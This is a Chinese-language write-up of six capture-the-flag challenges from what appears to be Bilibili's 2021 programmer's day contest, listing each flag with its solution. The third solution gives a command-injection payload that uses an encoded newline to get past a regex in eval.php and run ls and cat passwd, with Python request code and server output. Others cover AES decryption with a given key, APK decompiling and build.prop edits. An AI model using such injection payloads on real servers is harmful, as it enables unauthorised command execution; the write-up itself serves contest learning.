1024程序员节,网络安全七个找flag题目前六题解析
Fevy
2021年10月25日 00:52

加入1024程序员节,投稿&参赛赢万元奖励,解锁神秘彩蛋!​

第一题(安全攻防):a1cd5f84-27966146-3776f301-64031bb9

解析:

加密方式:AES 加密

加密模式:ECB

填充方式:无影响,都可以

Key:happy_1024_2233

密文:e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364 0408abca7deabb96a58f50471171b60e02b1a8dbd32db156

解密结果(flag):a1cd5f84-27966146-3776f301-64031bb9

第二题(安全攻防):36c7a7b4-cda04af0-8db0368d-b5166480

解析:打开网址网页链接​,进入开发者模式,在源代码选项里找到webpack://src/view/home.vue文件,第27行就是flag。

第三题(安全攻防):9d3c3014-6c6267e7-086aaee5-1f18452a

解析:

在git里下载 eval.php,可以看到正则表达式 ,这个可以用结尾接换行符匹配,然后换行用 Linux 命令。

使用根目录命令 ls 一下,向 网页链接​[]=1%0a&args[]=ls 发送 GET 请求:import requests url = "网页链接​[]=1%0a&args[]=ls"

response = requests.get(url=url)

print(response.text)

返回内容:

1.txt

passwd

data

config

flag 在 passwd 里,直接使用 Linux 命令 cat passwd,向 网页链接​[]=1%0a&args[]=cat&args[]=passwd 发送 GET 请求:

import requests

url = "网页链接​[]=1%0a&args[]=cat&args[]=passwd"

response = requests.get(url=url)

print(response.text)

∴flag:9d3c3014-6c6267e7-086aaee5-1f18452a

第四题(安全攻防):3d5dd579-0678ef93-18b70cae-cabc5d51

解析:抓包,获取flag

第五题(破解逆向):516834cc-50e448af-bcf9ed53-9ae4328e

解析:用JADX读代码,得到以下内容:

username:  516834cc-50e448af

password:  bcf9ed53-9ae4328e

∴flag:516834cc-50e448af-bcf9ed53-9ae4328e

第六题(破解逆向):b13981f4-5ae996d4-bc04be5b-34662a78

解析:

与第五题类似,第六题需要逆向 SO,需验证 ABI和系统版本,修改 build.prop,ro.product.cpu.abi 为 x86,ro.build.version.release 为 9,然后再创建 /data/2233,4 byte 一组就会变成 flag:b13981f4-5ae996d4-bc04be5b-34662a78

摘自@JoeJoe5专栏B站1024程序节 网络攻防改编